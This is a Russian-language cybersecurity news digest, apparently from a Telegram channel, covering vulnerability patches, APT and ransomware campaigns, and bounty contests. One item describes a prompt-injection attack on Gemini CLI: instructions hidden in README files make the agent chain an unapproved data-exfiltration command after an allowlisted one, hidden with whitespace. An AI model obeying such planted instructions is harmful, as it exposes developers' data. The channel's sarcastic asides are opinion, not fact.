39806
Руки-ножницы российского инфосека. Для связи - mschniperson@mailfence.com
Zero Day Initiative компании Trend Micro анонсирвала вознаграждение в размере 1 млн. долл. для исследователей, которые смогут продемонстрировать Zero-Click уязвимости WhatsApp на предстоящем хакерском конкурсе Pwn2Own Ireland 2025.
Meta (признанная в РФ экстремистской) наряду с Synology и QNAP выступила соорганизатором нового этапа конкурса Pwn2Own Ireland 2025, который пройдет с 21 по 24 октября в Корке, Ирландия.
Обещают также и более скромные денежные призы в категории WhatsApp.
В конкурсе заявлено восемь категорий, охватывающих мобильные устройства, мессенджеры, сетевое оборудование, устройства умного дома и NAS, принтеры, оборудование для видеонаблюдения и носимые девайсы, включая умные очки Ray-Ban от Meta и гарнитуры Quest 3/3S, а также флагманские смартфоны Samsung Galaxy S25, Google Pixel 9 и Apple iPhone 16.
ZDI также расширила векторы атак для мобильных устройств, включив в них использование USB-портов, что потребует от участников взлома заблокированных телефонов посредством физического подключения.
Традиционные беспроводные протоколы, такие как Wi-Fi, Bluetooth и беспроводная связь ближнего радиуса действия, остаются допустимыми методами атак.
Регистрация участников закрывается 16 октября в 17:00 по ирландскому стандартному времени. Порядок участников определяется рандомные образом.
После того, как уязвимости будут эксплуатированы во время Pwn2Own, в распоряжении поставщиков будет 90 дней на выпуск обновлений, прежде чем инициатива Zero Day Initiative публично их раскроет.
Призовой фонд прошлогодичного Pwn2Own Ireland по всем категориям составил 1 078 750 долл. и включал вознаграждения за демонстрацию более чем 70 нулей.
Так что заявленный миллион лишь за WhatsApp определенно можно считать рекордной суммой в истории хакерского поединка.
Правда в киберподполье этим не удивишь, расценки на нули в аналогичном упражнении - на порядок выше. NSO не дадут соврать.
В Google сообщили, что не получали запроса на создание секретного бэкдора от правительства Великобритании (via).
Потому что зачем делать новый, если старый работает неплохо!
Исследователи из Лаборатории Касперского в новом отчете раскрывают все более сложные и хитрые методы, которые применяют злоумышленники для сокрытия уже давно известных инструментов.
Во второй половине 2024 года российский IT-сектор стал объектом достаточно интересной атаки, нацеленной, преимущественно на крупные и средние отраслевые компании.
При этом следы злоумышленников удалось также найти в Китае, Японии, Малайзии и Перу.
Злоумышленники применили целый спектр вредоносных техник, чтобы обмануть системы безопасности и остаться незамеченными.
В частности, для обхода обнаружения они доставляли информацию о вредоносной нагрузке через профили в соцсетях, а также на других популярных ресурсах, где пользователи могут делиться контентом.
В частности, исследованные образцы обращались к GitHub, Microsoft Learn Challenge, Quora, а также русскоязычным соцсетям.
Атакующие таким образом старались скрыть свою активность и создать сложную цепочку выполнения давно известного и широко распространенного инструмента - Cobalt Strike Beacon.
Применяли также технику DLL Hijacking, которая становится все более популярна в киберподполье.
Несмотря на то, что пик атак пришелся на ноябрь-декабрь 2024 года, угроза сохраняла актуальность до конца апреля 2025-го.
При этом после нескольких месяцев тишины в июле исследователи ЛК стали вновь детектировать эту активность.
Злоумышленники использовали новые незначительно модифицированные вредоносные образцы.
Как удалось заметить, схема получения адреса, с которого загружается шелл-код, схожа со схемой получения С2, которая наблюдалась в кампании EastWind.
В обоих случаях URL-адрес содержится в специально созданном профиле на легитимной площадке, такой как Quora или GitHub.
Также в обоих случаях он зашифрован по алгоритму XOR.
Частично совпадают и цели двух кампаний: злоумышленников интересуют именно российские IT-компании.
Техническая часть и IOC - в отчете.
📦 Облегчённая песочница Linux с Landlock, не требующая root.
• Три года назад я писал статью, где рассказывал про Firejail — это такой гибкий и мощный инструмент изоляции, который не просто контролирует доступ к файловой системе, а полностью отрезает приложение от основной системы с помощью механизма Linux Namespaces.
• Так вот, недавно нашел другой интересный проект, который представляет собой облегчённую версию Firejail и не требует root. Проект называется Landrun, и вот так его описывает автор:
Меня всегда чертовски раздражало запускать случайные двоичные файлы из интернета без реального контроля над тем, к чему они могут получить доступ. Я выпустил Landrun, инструмент командной строки на основе Go, который оборачивает Linux Landlock (5.13+) для изоляции любого процесса без root, контейнеров или seccomp. Представьте себе firejail, но с безопасностью на уровне ядра, минимальными накладными расходами и встроенный в ядро. Поддерживает точный доступ к файлам (ro/rw/exec) и ограничения портов TCP (6.7+). Никаких демонов, никакого YAML, только флаги.
Один из крупнейших в мире операторов связи стал жертвой кибератаки.
Речь идет о французской Orange.
Компания предоставляет различные услуги в сфере связи для 294 млн. клиентов в Европе, Африке и на Ближнем Востоке, включая 256 млн. пользователей мобильной и 22 млн. пользователей фиксированной связи.
Компания насчитывает более 125 800 сотрудников по всему миру, выручка в 2024 году составила 40,3 миллиарда евро.
Скомпрометированная информационная система была обнаружена и изолирована от остальной сети подразделением ИБ Orange Cyberdefense 25 июля, что привело к сбоям в работе, которые должны быть устранены к 31 июля.
Согласно заявлению Orange Group, после обнаружения кибератаки компания уведомила соответствующие органы для проведения расследования, предварительные результаты которого указывают на отсутствие доказательств кражи каких-либо данных.
В Orange пока не связывает кибератаку с какой-либо конкретной хакерской группой или кластером угроз.
Однако исследователи находят сходство с аналогичными взломами AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, Windstream, Comcast, Digital Realty и Viasat которые переписывают китайской Salt Typhoon.
Но, скорее всего, опять белорусские киберпартизаны.
Apple выкатила исправления для десятков уязвимостей в своих операционных системах, в том числе для эксплуатируемой в реальных условиях ошибки.
Она отслеживается как CVE-2025-6558 и была раскрыта в середине июля, когда Google исправила ее в Chrome, выразив благодарность за ее обнаружения своей команде TAG и предупреждая о ее задействовании в качестве 0-day.
Ошибка связана с недостаточной проверкой ненадежных входных данных в графических компонентах Chrome ANGLE и GPU, которая может быть использована удаленно с помощью специально созданных HTML-страниц для выхода за пределы «песочницы» браузера.
Спустя неделю после того, как Google выпустила обновление Chrome 138, CISA добавила ошибку в свой каталог известных эксплуатируемых уязвимостей KEV. Правда, до сих пор не было ни одного отчета об атаках с использованием CVE-2025-6558.
В обновлениях для iOS и macOS Apple также представила исправления для CVE-2025-6558, которая влияет на WebKit и может привести к сбою Safari при посещении страницы с вредоносным контентом.
Но никаких свидетельств того, что эта уязвимость была использована в Safari пока нет.
В общей Apple выпустила исправления для 13 уязвимостей безопасности в WebKit, предупредив о возможности их задействования для XSS-атак, раскрытия конфиденциальной пользовательской информации, повреждения памяти, сбоя Safari или вызова состояния DoS.
Помимо WebKit другие компоненты платформы Apple также были улучшены, избавившись от значительного объема уязвимостей. В их числе: AppleMobileFileIntegrity, Model I/O и PackageKit.
Ещё одной заслуживающей внимания уязвимостью является CVE-2025-43223, которая затрагивает компонент CFNetwork в macOS и iOS, позволяя непривилегированным пользователям изменять ограниченные сетевые настройки.
CFNetwork Apple - это фреймворк, обеспечивающий сетевое взаимодействие, включая HTTP, HTTPS и другие протоколы. Поэтому любая уязвимость в фреймворке создаёт значительные риски безопасности.
В общем, Apple исправила 87 CVE в новом обновлении macOS Sequoia 15.6 и включила исправления для 29 уязвимостей в недавно выпущенные обновления iOS 18.6 и iPadOS 18.6.
В macOS Sonoma 14.7.7 исправлено 50 ошибок, в macOS Ventura 13.7.7 - 41 проблема, в iPadOS 17.7.9 - 19 ошибок, в watchOS 11.6 - 21 ошибка, а в tvOS 18.6 и visionOS 2.6 - по 24 ошибки.
Так что пользователям настоятельно рекомендуется как можно скорее обновить свои девайсы.
Уязвимость в Gemini CLI от Google позволяла злоумышленникам незаметно выполнять вредоносные команды и похищать данные с компьютеров разработчиков.
Ошибка была обнаружена Tracebit 27 июня, а исправления для нее стали доступны в версии 0.1.14, вышедшей 25 июля.
Gemini CLI, впервые выпущенный 25 июня 2025 года, представляет собой инструмент командной строки, разработанный Google, который позволяет разработчикам напрямую взаимодействовать с Gemini AI через терминал.
Инструмент способен выдавать рекомендации, писать код и даже выполнять команды локально, либо предварительно запрашивая разрешение у пользователя, а также используя механизм списка разрешенных действий.
Исследователи Tracebit сразу после его выпуска обнаружили, что Gemini CLI можно обманным путём заставить выполнить вредоносные команды.
В сочетании с уязвимостями пользовательского интерфейса эти команды могут привести к скрытым атакам на выполнение кода.
Эксплойт работает за счет использования процесса обработки Gemini CLI «контекстных файлов», в частности README.md и GEMINI.md, которые считываются в командной строке для анализа кодовой базы.
Исследователи Tracebit выяснили, что в этих файлах можно скрыть вредоносные инструкции для выполнения внедрения, в то время как плохой синтаксический анализ команд и обработка списков разрешений оставляют место для выполнения вредоносного кода.
Они продемонстрировали атаку, создав репозиторий, содержащий безобидный скрипт Python и зараженный файл README.md, а затем запустили его сканирование с помощью Gemini CLI.
Сначала Gemini получает указание запустить безобидную команду (grep ^Setup README.md), а затем запустить следующую за ней вредоносную команду извлечения данных, которая рассматривается как доверенное действие и не требует одобрения пользователя.
При этом вредоносная команда может быть любой (установка удаленной оболочки, удаление файлов и т.д.).
Более того, выходные данные Gemini можно визуально изменять с помощью пробелов, чтобы скрыть вредоносную команду от пользователя.
Безусловно, для атаки требуются некоторые серьезные предпосылки (например, предполагается, что у пользователя есть разрешенные определенные команды), но при определенных условиях во многих случаях злоумышленник может добиться желаемых результатов.
Пользователям Gemini CLI рекомендуется обновиться до google/gemini-cli">версии 0.1.14 последней), а также избегать запуска инструмента с неизвестными или ненадёжными кодовыми базами (либо делать это только в изолированных средах).
Tracebit протестировала метод атаки на других подобных инструментах, включая OpenAI Codex и Anthropic Claude, но как оказалось, безуспешно, в виду реализации более надежных механизмов разрешенного списка.
Активно эксплуатируемая в реальных атаках критическая RCE-уязвимость без аутентификации в Cisco Identity Services Engine (ISE) теперь обзавелась эксплойтом, которым публично поделился исследователь Бобби Гулд.
Она была впервые обнаружена 25 июня 2025 года и влияет на ISE и ISE-PIC 3.3 и 3.4, позволяя неаутентифицированным удаленным злоумышленникам загружать произвольные файлы в целевую систему и выполнять их с привилегиями root.
Проблема возникает из-за небезопасной десериализации и внедрения команд в методе enableStrongSwanTunnel().
Три недели спустя поставщик добавил в тот же бюллетень еще одну CVE-2025-20337, которая относится к той же проблеме, но теперь отслеживается в составе двух частей: CVE-2025-20281 (внедрение команды) и CVE-2025-20337 (десериализация).
Несмотря на то, что исправления уже были доступны ранее, Cisco настоятельно рекомендовала пользователям обновиться до версий 3.3 Patch 7 и 3.4 Patch 2 для устранения обеих уязвимостей.
22 июля 2025 года Cisco отметила CVE-2025-20281 и CVE-2025-20337 как активно используемые в атаках, призывая администраторов как можно скорее установить обновления.
В ближайшее время в полку атакующих явно прибавиться, ведь 25 июля Гулд выкатил технические подробности, демонстрируя запуск уязвимости внедрения команд в Cisco ISE с помощью сериализованной полезной нагрузки Java String[].
Исследователь добился выполнения произвольной команды от имени пользователя root внутри контейнера Docker, используя поведение Runtime.exec() Java и ${IFS} для обхода проблем токенизации аргументов.
Кроме того, он показал, как выйти из привилегированного контейнера Docker и получить права root на хост-системе, используя известную технику выхода из контейнера Linux на основе cgroups и release_agent.
Несмотря на то, что доводы Гулда не являются готовым скриптом эксплойта, который хакеры могут напрямую позаимствовать в свои цепочки атак, тем не менее отражают все технические подробности и структуру полезной нагрузки, которые будут весьма востребованными киберподпольем для воссоздания всего эксплойта.
Следует отметить, что обходных путей для этой уязвимости не существует, поэтому единственно рекомендуемым вариантом устранения CVE-2025-20281 являются лишь исправления, указанные в бюллетене Cisco.
Новой жертвой банды американских силовиков стала BlackSuit, которая за последние несколько лет расчехлила сети сотен организаций по всему миру.
Возглавивший операцию под кодовым названием Operation Checkmate Минюст США официально озвучил итоги в своем заявлении, подтверждая конфискацию доменов согласно полученному ордеру суда.
Теперь на публичных сайтах BlackSuit висят соответствующие баннеры.
В составе силовой банды отметились: Секретная служба США, Национальная полиция Нидерландов, Управление уголовной полиции Германии, Национальное агентство по борьбе с преступностью Великобритании, Генеральная прокуратура Франкфурта, Министерство юстиции, Украинская киберполиция и Европол.
Техническое сопровождение осуществляли представители подразделения по борьбе с киберпреступностью (известного как Draco Team) румынской Bitdefender.
BlackSuit начала свою деятельность в январе 2022 года под названием Quantum Ransomware и считается прямым преемником синдиката Conti.
Изначально они использовали шифровальщики других банд (ALPHV/BlackCat), но вскоре внедрили собственный - Zeon, и в сентябре 2022 года переименовались в Royal Ransomware.
В июне 2023 года после нападения на муниципальные органы Далласа, штат Техас, банда Royal сменила логотип на BlackSuit и перешла на новый шифровальщик.
Осенью того же года связь Royal и BlackSuit подтвердили в CISA и ФБР, приписав им 350 жертв и вменяя преступный доход до 275 млн. долл. (а общая запрашиваемая сумма выкупов - до полумиллиарда).
В общем пока правоохранители делили медали вдруг выяснилось то, о чем мы неоднократно уже говорили по поводу участившихся виртуальных операций западных спецслужб.
Исследователи Cisco Talos обнаружили артефакты, указывающие на то, что разработчики вируса-вымогателя BlackSuit, по всей видимости, орудуют уже под новый брендом Chaos Ransomware.
Talos с умеренной степенью уверенности полагает, что новая группа вымогателей Chaos либо является ребрендингом вируса-вымогателя BlackSuit (Royal), либо к управлению причастны некоторые из ее бывших членов.
Атрибуция основана на сходстве TTPs, включая команды шифрования, темы и структуру записок с требованием выкупа, а также использование инструментов LOLbins и RMM в своих атаках.
Более 200 000 сайтов WordPress продолжают работать с уязвимой версией плагина Post SMTP, которая позволяет получить контроль над учетной записью администратора.
Post SMTP - популярный плагин для обработки электронной почты в WordPress с более чем 400 000 активных установок, который позиционируется как более надёжная и многофункциональная реализация стандартной функции wp_mail().
23 мая сообщение об уязвимости было направлено в PatchStack. Уязвимости был присвоен CVE-2025-24000 и оценка CVSS 8,8.
Проблема затрагивает все версии Post SMTP до 3.2.0 и вызвана некорректным механизмом контроля доступа в конечных точках REST API плагина, который проверял только, вошел ли пользователь в систему, не проверяя при этом уровень его разрешений.
Так что пользователи с низкими привилегиями (такие как подписчики), могли получить доступ к журналам электронной почты со всем ее содержимым.
Подписчик мог инициировать сброс пароля для учетной записи администратора, перехватить соответствующее электронное письмо через журналы и получить контроль над учетной записью.
Разработчики плагина представили исправление для рассмотрения Patchstack 26 мая.
Проблему удалось решить включением дополнительных проверок привилегий в get_logs_permission перед предоставлением доступа к конфиденциальным вызовам API.
Исправление было включено в версию Post SMTP 3.3.0, опубликованную 11 июня.
Тем не менее, статистика загрузок на WordPress указывает на то, что лишь менее половины пользователей плагина (48,5%) обновились до версии 3.3.
При это более 200 000 сайтов остаются уязвимы к CVE-2025-24000, а половина из них и вовсе используют версии Post SMTP из ветки 2.x, уязвимые также для ряда иных проблем, формируя практически идеальные условия для атаки на цепочку мудаков реализации масштабной кампании.
Исследователи Seqrite Labs раскрыли кампанию кибершпионажа Operation CargoTalon, нацеленную на российские предприятия аэрокосмической и оборонной отраслей с использованием бэкдора EAGLET.
Вредоносная активность была атрибутирована к кластеру угроз, отслеживаемому как UNG0901 (Unknown Group 901).
Целями стали сотрудники Воронежского авиационного производственного объединения, одного из крупнейших предприятий по производству самолетов в России.
В атаках задействовались фишинговые письма с приманками на тему доставки грузов с ZIP-архивом, внутри которого находился LNK-файл, использующий PowerShell для отображения поддельного документа Microsoft Excel, а также внедряющий на хост файл DLL EAGLET.
EAGLET реализует сбор системной информации и устанавливает соединения с жестко запрограммированным удаленным сервером («185.225.17[.]104»), а после получения HTTP-ответа - выполняет на скомпрометированной машине Windows команды.
Имплант поддерживает доступ к оболочке и возможность загрузки/выгрузки файлов, но точный характер доставляемых полезных нагрузок следующего этапа неизвестен, учитывая, что сервер C2 к моменту исследования оставался в автономном режиме.
Исследователи Seqrite заявляют, что также обнаружили схожие кампании в отношении российского ВПК с использованием EAGLET, не говоря уже о совпадениях исходного кода и целей с Head Mare, о которых ранее сообщали исследователи Лаборатории Касперского.
В частности, отмечены функциональные параллели между EAGLET и PhantomDL - бэкдором на базе Go с оболочкой и возможностью загрузки/выгрузки файлов, а также сходство в алгоритме наименований, применяемой к вложениям в фишинговых сообщениях.
Индикаторы компрометации и технические подробности - в отчете индийской компании.
Печальные новости для участников хакерского форума Leak Zone.
IP-адреса авторизованных в системе пользователей в составе базы данных ElasticSearch оказались в открытом доступе без пароля и теперь попали в руки исследователей UpGuard, обнаруживших утечку.
Всего в ней в содержалось около 22 миллионов объектов, каждый из которых представлял собой запись веб-запроса с указанием домена, на который был отправлен запрос, IP-адрес пользователя и метаданные (местоположение и интернет-провайдер).
Помимо leakzone[.]net (95% всех записей) в базе фигурировал домен, упоминаемый в 2,7% записей - accountbot[.]io, сайт для продажи взломанных аккаунтов.
Начиная с 2020 года Leak Zone задействовался киберподпольем для реализации различных хакерских утилит, эксплойтов и слитых баз и учетных данных, а теперь и сам стал одной из таких утечек.
Sophos устранила пять уязвимостей в своем брандмауэре, которые позволяют удаленным злоумышленникам выполнять произвольный код.
Первая проблема отслеживается как CVE-2025-6704 (CVSS 9,8) и представляет собой критическую ошибку произвольной записи файлов в функции Secure PDF eXchange (SPX) устройства, которая позволяет удаленным неаутентифицированным злоумышленникам реализовать RCE.
Согласно рекомендациям Sophos, ошибка затрагивает лишь часть развертываний брандмауэров, поскольку может проявиться только в том случае, если включена определенная конфигурация SPX и брандмауэр работает в режиме высокой доступности (HA).
Вторая CVE-2025-7624 (CVSS 9,8) - это проблема SQL-инъекции в устаревшем прокси-сервере SMTP устройства.
Также приводя к RCE, уязвимость проявляется только если для электронной почты активна политика карантина, а SFOS была обновлена с версии старше 21.0 GA.
Таким образом, по данным Sophos, она затрагивает менее 1% устройств.
Компания также устранила серьезную ошибку внедрения команд в компоненте WebAdmin брандмауэра, которая позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольный код на вспомогательных устройствах высокой доступности (HA).
Уязвимость, обозначенная как CVE-2025-7382 (CVSS 8,8), может быть активирована только в том случае, если включена аутентификация OTP для пользователя-администратора.
За последний месяц компания Sophos выпустила исправления для решения этих проблем в версиях брандмауэра 19.0 MR2 (19.0.2.472), 20.0 MR2 (20.0.2.378), 20.0 MR3 (20.0.3.427), 21.0 GA (21.0.0.169), 21.0 MR1 (21.0.1.237), 21.0 MR1-1 (21.0.1.272), 21.0 MR1-2 (21.0.1.277) и 21.5 GA (21.5.0.171).
Исправления также были включены в версию 21.0 MR2 устройства.
Последние две ошибки, описанные в бюллетене Sophos, CVE-2024-13974 и CVE-2024-13973, затрагивают компоненты Up2Date и WebAdmin устройства.
Для их эксплуатации злоумышленникам необходимо контролировать DNS-среду брандмауэра и войти в систему в качестве администратора соответственно.
Исправления этих дефектов впервые были включены в версию Sophos Firewall 21.0 MR1.
Компания заявляет, что пользователям более старых версий брандмауэра необходимо обновиться, чтобы получить все исправления.
Sophos отмечает, что не наблюдала случаев эксплуатации этих уязвимостей в реальных условиях.
Исследователи Akamai проанализировали последнюю версию банковского трояна для Windows - Coyote, и обнаружили задействование фреймворка Microsoft UI Automation (UIA) для получения данных со скомпрометированных устройств.
Фактически, по данным Akamai, Coyote - это первая вредоносная ПО, которая использует фреймворк UIA.
Coyote, впервые задокументированный Лабораторией Касперского в 2024 году, используется для атак на устройства Windows в Латинской Америке.
Он поддерживает кейлоггеры и фишинговые оверлеи для сбора данных, в частности, учётных данных для банковских и криптосервисов.
UIA является частью Microsoft .NET Framework и представляет собой легитимную функцию Microsoft, обеспечивающую программный доступ к элементам пользовательского интерфейса на рабочем столе.
Он позволяет вспомогательным технологическим продуктам предоставлять конечным пользователям информацию о пользовательском интерфейсе и управлять им с помощью средств, отличных от стандартного ввода.
В декабре 2024 года Akamai предупредила, что злоумышленники могут использовать UIA в вредоносных целях, заставляя пользователя запустить специально созданное приложение, использующее эту платформу.
Исследователи продемонстрировали возможности использования UIA для скрытого выполнения команд, перенаправления браузера и кражи конфиденциальных данных. Атаки работают на любой версии Windows и позволяют обходить защитные решения.
Недавно компания Akamai обнаружила, что ранее описанные риски теперь имеют вполне практическую реализацию: разработчики вредоносных ПО начали злоупотреблять UIA.
Причем Coyote, по-видимому, стал первым вредоносным ПО, операторы которого смогли сделать это в реальных условиях.
Несмотря на то, что UIA потенциально может использоваться для кражи конфиденциальных данных, разработчики Coyote полагаются на него для определения, какими финансовыми услугами пользуется жертва.
Вредоносная ПО сначала использует API Windows для получения заголовков открытых окон, проверяя их соответствие списку жёстко запрограммированных адресов веб-сайтов, связанных с банками и криптосервисами.
Если совпадений не обнаружено, вредоносная программа использует UIA для анализа дочерних элементов пользовательского интерфейса окна, что позволяет ей проверять вкладки и адресные строки браузера на соответствие зашитым в код адресам веб-сайтов.
Последняя версия вредоносного ПО таргетируется на 75 различных финансовых учреждений, в то время как ранее в январе этого года лаборатория Fortinet FortiGuard Labs фиксировала 73.
Как отмечаюи исследователи, без UIA разбор подэлементов другого приложения - достаточно нетривиальная задача.
Ведь чтобы эффективно читать содержимое подэлементов в другом приложении, разработчику необходимо очень хорошо понимать структуру конкретного целевого приложения.
Кроме того, Coyote может выполнять проверки независимо от того, находится ли вредоносная ПО в онлайн-режиме или в оффлайне, а это значительно увеличивает шансы успешно идентифицировать целевой банк или криптобиржу жертвы для того, что выкрасть учётные данные.
Финансовый сектор, промышленность и государственные учреждения остаются в числе главных целей киберпреступников в России.
Это подтверждается как общими наблюдениями, так и конкретными инцидентами, выявленными в ходе работы команды Kaspersky Managed Detection and Response (MDR).
Сервис MDR Лаборатории Касперского помогает компаниям своевременно детектировать и лочить атаки за счёт постоянного мониторинга, анализа телеметрии и выстроенных процессов реагирования.
Тем не менее, эффективность даже самого продвинутого сервиса зависит от полноты охвата инфраструктуры.
Недавний инцидент, связанный с таргетированной атакой на государственные IT-сервисы, в одной из африканских стран это наглядно подтверждает.
Злоумышленники использовали «вшитые» в код вредоносного ПО внутренние сервисы, IP-адреса и прокси-серверы, а одним из C2 стал захваченный сервер SharePoint внутри инфраструктуры заказчика.
Задействовался широкий арсенал инструментов, который включал не только самописное, но и общедоступное ПО (такое как Cobalt Strike).
Для сокрытия своих действий злоумышленники прямо во время атаки адаптировали применяемые техники, например переписывали исполняемые файлы и компилировали их как DLL для DLL sideloading.
Аналитики Kaspersky MDR зафиксировали активность модулей WmiExec и Atexec (набор инструментов Impacket) на хосте, который не был подключен к мониторингу.
После завершения работы модулей атакующие временно затаились, а затем стали проверять наличие защитных решений и использовать уязвимые участки инфраструктуры для дальнейшего распространения атаки.
При этом выявить следы использования Cobalt Strike и другие артефакты удалось лишь после подключения хоста к MDR.
В ходе всестороннего анализа инцидента активность была по итогу атрибутирована к китайской APT41, которая специализируется на кибершпионаже и нацелена на широкий спектр отраслей по меньшей мере в 42 странах. Причем до сих пор Африке APT была наименее активна.
Хотя представленный кейс завершился относительно благополучно, тем не менее он подчёркивает ключевое условие эффективности MDR: безопасность не может быть фрагментарной.
Отсутствие мониторинга хотя бы на одном сегменте инфраструктуры может превратить его в «слепое пятно» и точку входа для атаки. Полнота телеметрии напрямую влияет на своевременность и точность реагирования.
При этом сервис Kaspersky MDR базируется на многолетней экспертизе и глобальной базе знаний об угрозах (Threat Intelligence).
Ежегодно команда публикует подробные аналитические отчёты с актуальной информацией об угрозах и методах защиты.
Один из таких кейсов разобран в недавнем отчете по APT41 в Африке со всеми техническими деталями и IoCs.
Исследователи Bitdefender обнаружили исправленные критические уязвимости в прошивках умных камер Dahua, которые позволяют злоумышленникам перехватывать управление уязвимыми устройствами.
Уязвимости затрагивают протокол ONVIF и обработчики загрузки файлов, позволяя неавторизированным злоумышленникам удаленно выполнять произвольные команды.
Проблемы отслеживаются как CVE-2025-31700 и CVE-2025-31701 (CVSS: 8,1) и влияют на следующие устройства с версиями до 16 апреля 2025 года: IPC-1XXX, IPC-2XXX, IPC-WX, IPC-ECXX, SD3A, SD2A, SD3D, SDT2A и SD2C Series.
Оба недостатка относятся ошибкам переполнения буфера и эксплуатируются путем отправки специально созданных вредоносных пакетов, что потенциально приводит к DoS или RCE.
В частности, CVE-2025-31700 описывается как переполнение стека буфера в обработчике запросов ONVIF (Open Network Video Interface Forum), тогда как уязвимость CVE-2025-31701 касается ошибки переполнения в обработчике загрузки файлов RPC.
Как отмечает Dahua, некоторые устройства имеют защитные механизмы, в том числе рандомизацию адресного пространства (ASLR), что снижает вероятность успешного использования RCE.
Однако атаки типа DoS по-прежнему вполне реализуемы.
В свою очередь, Bitdefender предупреждает, что устройства, подключенные к интернету через переадресацию портов или UPnP, особенно подвержены риску, а успешная эксплуатация обеспечивает доступ к камере с правами root без взаимодействия с пользователем.
При этом эксплойт обходит проверки целостности прошивки, так что злоумышленники могут загружать неподписанные полезные нагрузки или сохраняться через пользовательские демоны, что затрудняет очистку.
Учитывая, что устройства Dahua популярны, в том числе и в России, пользователям следует внимательно отнестись к рекомендациям поставщика и накатить соответствующие обновления.
🥷❗️F6: новый игрок на рынке RaaS с прицелом на Россию
Аналитики Threat Intelligence F6 изучили вымогательский сервис Pay2Key, который распространяется на киберпреступных русскоязычных форумах по модели RaaS с конца февраля 2025 года.
С начала 2025 года на теневых форумах активизировался новый вымогательский сервис Pay2Key, распространяемый как RaaS (Ransomware as a Service) и построенный на базе известного шифровальщика Mimic. Из особенностей сервиса стоит отметить то, что он доступен только в сети аналогичной TOR — I2P:
Несмотря на негласные правила, запрещающие атаки по СНГ, партнеры проекта Pay2Key уже попытались поразить российские компании из сфер финансов, строительства и ритейла — весной было обнаружено как минимум три фишинговые кампании, нацеленные на российских пользователей. Сервис работает в анонимной сети I2P (Invisible Internet Project), а в арсенале атакующих — SFX-архивы, фишинг, легитимные утилиты и продвинутые способы обхода антивирусной защиты.
....
Программа-вымогатель Pay2Key является отдельной ветвью развития (форком) другого распространенного шифровальщика – Mimic. По нашему мнению, программа-вымогатель Mimic является одной из самых сложных современных программ-вымогателей. В феврале распространялась программа Pay2Key версии 1.1, на настоящий момент актуальной является версия 1.2.
Исследователи GreyNoise обнаружили, что примерно в 80% случаев всплески вредоносной активности предшествуют появлению новых уязвимостей в течение последующих шести недель.
В компании полагают, что подобные явления не случайны, а характеризуются цикличными и статистически обусловленными закономерностями.
В основе выводов GreyNoise - аналитика на базе данных Глобальной сети наблюдений (GOG), собираемых с сентября 2024 года с применением объективных статистических пороговых значений, исключающих выборочного искажения результатов.
После фильтрации лишних данных компания отследила 216 событий, которые были квалифицированы как всплески активности, связанные с восемью поставщиками корпоративных периферийных устройств.
Из всех 216 изученных скачков активности в 50 процентах в течение последующих трех недель наблюдался новый CVE, а в 80 процентах - в течение шести.
Данная корреляция особенно сильно затрагивала решения Ivanti, SonicWall, Palo Alto Networks и Fortinet и слабее для MikroTik, Citrix и Cisco, которые неоднократно становились объектами APT-атак и выступали основой для первоначального доступа.
GreyNoise отмечает, что в большинстве выявленных скачков вредной активности злоумышленники задействовали эксплойты для уже известных уязвимостей.
Исследователи полагают, что это либо способствует обнаружению новых уязвимостей, либо идентификации конечных точек, доступных через Интернет, которые могут стать целью на последующем этапе атаки с использованием новых эксплойтов.
Как правило, реагирование реализуется после публикации CVE, но результаты GreyNoise демонстрируют, что поведение злоумышленника может быть опережающим индикатором для организации проактивной защиты.
Описанные в отчете всплески, предшествующие раскрытию информации, могут быть служить сигналом для подготовки к потенциальной атаке безотносительно конкретных проблем и систем, которые они затрагивают.
GreyNoise рекомендует внимательно отслеживать активность сканирования и оперативно блокировать исходные IP-адреса, поскольку это исключает их из процесса разведки, который обычно впоследствии приводит к реальным атакам.
Поэтому, как подчеркивают исследователи, не следует игнорировать сканирования старых уязвимостей (попытки которых предпринимаются злоумышленниками для каталогизации уязвимых активов) и списывать их на неудачные попытки взлома полностью пропатченных конечных точек.
Honeywell устранила ряд критических и высокосерьёзных уязвимостей в решении Experion Process Knowledge System (PKS) для управления и автоматизации промышленных процессов.
Соответствующее предупреждение также выкатила CISA, отметив использование затронутого продукта на объектах КИИ, включая производство, химическую промышленность, энергетику, водоснабжение и здравоохранение.
Согласно бюллетеню, Honeywell Experion PKS до версий R520.2 TCU9 Hot Fix 1 и R530 TCU3 Hot Fix 1 подвержены шести уязвимостям, в том числе уязвимостям.
Большинство критических и высокосерьёзных уязвимостей затрагивают компонент управления доступом к данным (CDA) и могут привести к RCE.
Две уязвимости высокой степени серьезности могут быть использованы для DoS-атак, а шибка средней степени серьезности может быть использована для манипулирования каналами связи и вызова некорректного поведения системы.
Раскрытие приписывается исследователям Positive Technologies, которые отмечают затронутые устройства обычно используются на промышленных предприятиях в изолированных сегментах сети, делая маловероятным их удаленную эксплуатацию через Интернет.
Позитивы нашли проблему в обработчиках сетевых протоколов, в которых отсутствуют функции идентификации и аутентификации.
В результате единственным условием эксплуатации уязвимости является доступ к изолированному сегменту.
По словам исследователей, уязвимости позволяют выполнять произвольный код на скомпрометированных устройствах, что потенциально может позволить злоумышленнику манипулировать производственным процессом и самими устройствами.
В свою очередь, Honeywell в своем уведомлении о безопасности анонсировала обновления для Experion PKS (C300 PCNT02, C300 PCNT05, EHB, EHPM, ELMM, Classic ENIM, ETN, FIM4, FIM8, UOC, CN100, HCA, C300PM, PGM, RFIM и C200E), а также OneWireless WDM.
Исследователи Avast выпустили общедоступный дешифратор для вируса-вымогателя FunkSec.
С момента появления в декабре 2024 года FunkSec атаковала 113 жертв, чьи данные украденные данные размещались на DLS банды до тех, пор пока в марте сайт не был закрыт.
FunkSec изначально занималась лишь кражей данных и последующим вымогательством, но затем добавила и шифрование.
Причем, как полагают в Avast, для написания этого вируса-вымогателя задействовался ИИ.
Файлы, зашифрованные с помощью вируса-вымогателя FunkSec, имеют расширение «.funksec». Кроме того, в каждую папку помещается файл с требованием выкупа под названием «README-{random}.md».
Программа-вымогатель написана на языке Rust. Для криптографических операций она использует библиотеку orion-rs версии 0.17.7.
Файлы шифруются с помощью Chacha20 с использованием Poly1305 MAC.
Инструкция по запуску дешифратора - в очтете.
Исследователи Binarly предупредили об уязвимостях в устройствах Lenovo, которые позволяют повышать привилегии, выполнять код и обходить защиту, а также внедрять импланты в целевые системы.
В общей сложности было найдено шесть уязвимостей в BIOS Insyde моноблоков Lenovo IdeaCentre и Yoga, в частности в режиме управления системой SMM - режиме работы, предназначенном для низкоуровневого управления системой.
